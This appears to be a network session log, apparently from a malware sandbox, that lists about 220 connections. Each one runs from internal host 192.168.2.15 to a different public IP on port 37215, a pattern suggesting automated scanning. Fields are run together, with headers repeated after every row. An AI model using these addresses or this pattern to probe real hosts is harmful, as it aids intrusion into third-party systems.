                                              18829192.168.2.155625231.143.123.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18830192.168.2.1536238122.201.68.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18831192.168.2.1538446222.26.178.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18832192.168.2.1553658138.163.14.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18833192.168.2.1556498186.136.13.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18834192.168.2.1554910102.185.3.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18835192.168.2.1534888181.79.147.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18836192.168.2.1545358222.254.153.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18837192.168.2.1536478121.16.1.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18838192.168.2.1553164211.108.168.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18839192.168.2.1536270190.242.145.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18840192.168.2.1547554122.124.118.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18841192.168.2.1557572102.107.81.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18842192.168.2.1535200138.85.183.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18843192.168.2.155892637.224.175.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18844192.168.2.1543396138.1.222.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18845192.168.2.1558664156.218.189.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18846192.168.2.1549342156.36.179.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18847192.168.2.1542642157.3.60.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18848192.168.2.1556966102.144.30.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18849192.168.2.155782641.242.214.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18850192.168.2.1556346157.28.22.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18851192.168.2.154110037.29.12.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18852192.168.2.1547354190.78.174.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18853192.168.2.1542456157.128.26.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18854192.168.2.1538864186.9.196.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18855192.168.2.1535776222.102.253.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18856192.168.2.1549236219.136.7.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18857192.168.2.154037437.96.161.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18858192.168.2.1555758186.255.156.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18859192.168.2.1541244102.156.103.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18860192.168.2.1553488197.192.121.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18861192.168.2.1556134197.137.137.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18862192.168.2.155715431.226.153.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18863192.168.2.1548086138.173.135.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18864192.168.2.1558318167.4.118.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18865192.168.2.154430245.151.253.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18866192.168.2.1546594122.246.105.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18867192.168.2.1549268190.16.70.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18868192.168.2.1537240138.192.205.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18869192.168.2.1541958131.111.88.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18870192.168.2.1547980190.162.252.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18871192.168.2.1556586138.44.150.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18872192.168.2.153479041.108.74.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18873192.168.2.155911294.57.238.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18874192.168.2.1542516157.198.43.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18875192.168.2.1541606222.43.128.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18876192.168.2.154428437.166.87.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18877192.168.2.155782637.117.89.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18878192.168.2.1559930197.135.246.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18879192.168.2.1535956186.51.130.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18880192.168.2.153653831.65.218.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18881192.168.2.1542804121.117.160.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18882192.168.2.1544942157.208.128.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18883192.168.2.1539328197.157.95.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18884192.168.2.1544094197.110.50.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18885192.168.2.153979845.143.94.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18886192.168.2.1557038156.48.17.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18887192.168.2.153986694.139.187.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18888192.168.2.1536188190.9.230.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18889192.168.2.1551176138.167.217.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18890192.168.2.1537750222.233.232.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18891192.168.2.154642294.210.137.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18892192.168.2.1546386122.125.75.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18893192.168.2.1549740181.118.250.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18894192.168.2.1538506102.197.206.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18895192.168.2.1548978121.24.27.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18896192.168.2.154114494.180.71.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18897192.168.2.154225294.42.91.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18898192.168.2.1550872190.234.194.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18899192.168.2.153881637.118.148.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18900192.168.2.1555966138.145.221.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18901192.168.2.154150494.9.238.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18902192.168.2.1551108157.38.195.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18903192.168.2.1549072185.232.147.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18904192.168.2.1554398186.187.244.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18905192.168.2.1555050181.250.155.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18906192.168.2.1552116186.226.85.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18907192.168.2.1560496197.194.221.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18908192.168.2.1552780186.18.92.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18909192.168.2.1560584102.41.144.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18910192.168.2.1547724190.60.222.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18911192.168.2.1537348121.254.183.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18912192.168.2.1554904138.238.0.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18913192.168.2.1546642186.79.77.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18914192.168.2.1557980222.45.133.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18915192.168.2.1546826121.27.168.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18916192.168.2.1554392186.174.224.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18917192.168.2.1544910121.225.127.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18918192.168.2.153911831.54.141.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18919192.168.2.1543828121.88.15.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18920192.168.2.1556884197.232.244.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18921192.168.2.1532772122.142.35.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18922192.168.2.1533180138.154.38.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18923192.168.2.1548886181.16.111.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18924192.168.2.1537656181.234.188.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18925192.168.2.1540594122.94.228.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18926192.168.2.1540722197.184.158.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18927192.168.2.155770294.104.29.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18928192.168.2.1546064172.15.184.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18929192.168.2.153522837.227.235.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18930192.168.2.1534576121.122.213.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18931192.168.2.154017231.245.24.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18932192.168.2.155718445.188.10.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18933192.168.2.1554404181.249.105.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18934192.168.2.1556892121.239.234.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18935192.168.2.1545230181.146.69.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18936192.168.2.1533930156.137.35.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18937192.168.2.155498637.59.131.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18938192.168.2.1538472156.184.182.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18939192.168.2.1556728170.213.151.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18940192.168.2.1560424157.227.72.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18941192.168.2.154446831.51.188.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18942192.168.2.1541686190.2.49.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18943192.168.2.153759631.179.144.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18944192.168.2.1555334186.208.157.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18945192.168.2.1549900222.189.248.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18946192.168.2.154567037.155.246.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18947192.168.2.1537784190.163.108.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18948192.168.2.1542818157.145.49.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18949192.168.2.154822887.151.132.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18950192.168.2.1533178222.200.18.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18951192.168.2.154734831.62.228.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18952192.168.2.1534330121.238.152.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18953192.168.2.1547988168.221.161.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18954192.168.2.1558136218.194.158.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18955192.168.2.155352041.9.19.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18956192.168.2.155803094.205.50.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18957192.168.2.153541231.222.112.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18958192.168.2.1555272175.85.140.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18959192.168.2.1548214122.21.134.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18960192.168.2.155136431.235.87.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18961192.168.2.1550444138.199.7.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18962192.168.2.1558594186.177.185.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18963192.168.2.1546750222.211.21.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18964192.168.2.1557502104.157.253.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18965192.168.2.1551418181.246.249.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18966192.168.2.1539876157.166.235.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18967192.168.2.1552902155.135.48.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18968192.168.2.1551766222.77.45.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18969192.168.2.153356631.251.91.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18970192.168.2.1555808156.49.211.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18971192.168.2.155554637.129.208.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18972192.168.2.155017441.202.16.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18973192.168.2.154649637.234.29.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18974192.168.2.1556076222.176.180.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18975192.168.2.1541462121.105.180.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18976192.168.2.1548644156.130.241.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18977192.168.2.1559686186.23.151.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18978192.168.2.1542596157.145.154.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18979192.168.2.153427037.93.117.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18980192.168.2.154825431.63.37.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18981192.168.2.153745631.241.128.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18982192.168.2.1560030134.75.141.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18983192.168.2.1556400186.41.133.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18984192.168.2.1537424190.75.26.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18985192.168.2.1559254156.226.240.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18986192.168.2.155199437.13.168.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18987192.168.2.1541654185.108.84.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18988192.168.2.1537032122.26.139.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18989192.168.2.1560156222.84.217.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18990192.168.2.1533220197.61.141.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18991192.168.2.155528041.190.28.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18992192.168.2.1550982122.95.211.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18993192.168.2.154230437.206.16.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18994192.168.2.154594662.77.101.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18995192.168.2.1553936138.222.23.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18996192.168.2.154403837.240.117.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18997192.168.2.1545976121.133.12.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18998192.168.2.155633696.231.240.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18999192.168.2.1557174156.57.19.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19000192.168.2.1545440197.222.248.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19001192.168.2.154677494.78.185.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19002192.168.2.155369094.195.167.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19003192.168.2.1546444157.176.7.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19004192.168.2.1540098222.203.95.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19005192.168.2.153491245.18.255.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19006192.168.2.1538354121.80.110.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19007192.168.2.1544806122.42.55.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19008192.168.2.155333294.58.66.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19009192.168.2.1532844148.202.222.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19010192.168.2.1552580197.76.235.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19011192.168.2.153951294.15.13.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19012192.168.2.1541464157.131.126.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19013192.168.2.154013637.7.157.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19014192.168.2.1555918157.155.146.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19015192.168.2.1552962190.102.80.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19016192.168.2.1560352157.235.156.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19017192.168.2.154763094.45.39.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19018192.168.2.1539026102.176.64.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19019192.168.2.1534594138.206.212.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19020192.168.2.155494241.217.3.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19021192.168.2.1558586222.160.154.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19022192.168.2.1552896121.144.199.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19023192.168.2.1558418138.166.5.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19024192.168.2.1550466102.30.218.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19025192.168.2.1559216130.21.160.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19026192.168.2.153386494.127.217.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19027192.168.2.1539910138.138.148.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19028192.168.2.155187237.19.167.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19029192.168.2.1559560156.132.130.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19030192.168.2.154077231.123.223.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19031192.168.2.155455437.117.79.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19032192.168.2.154740845.194.56.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19033192.168.2.1545644181.223.221.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19034192.168.2.1541466222.14.40.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19035192.168.2.1560964186.6.103.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19036192.168.2.1540352138.46.215.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19037192.168.2.155636094.36.89.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19038192.168.2.1552616181.141.39.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19039192.168.2.1547894190.170.158.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19040192.168.2.1540574197.251.64.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19041192.168.2.155202831.220.75.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19042192.168.2.1549502156.39.147.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19043192.168.2.1556846186.84.90.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19044192.168.2.1555504122.132.63.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19045192.168.2.1551920222.174.137.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19046192.168.2.1540088157.5.188.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19047192.168.2.1548478138.226.87.19537215
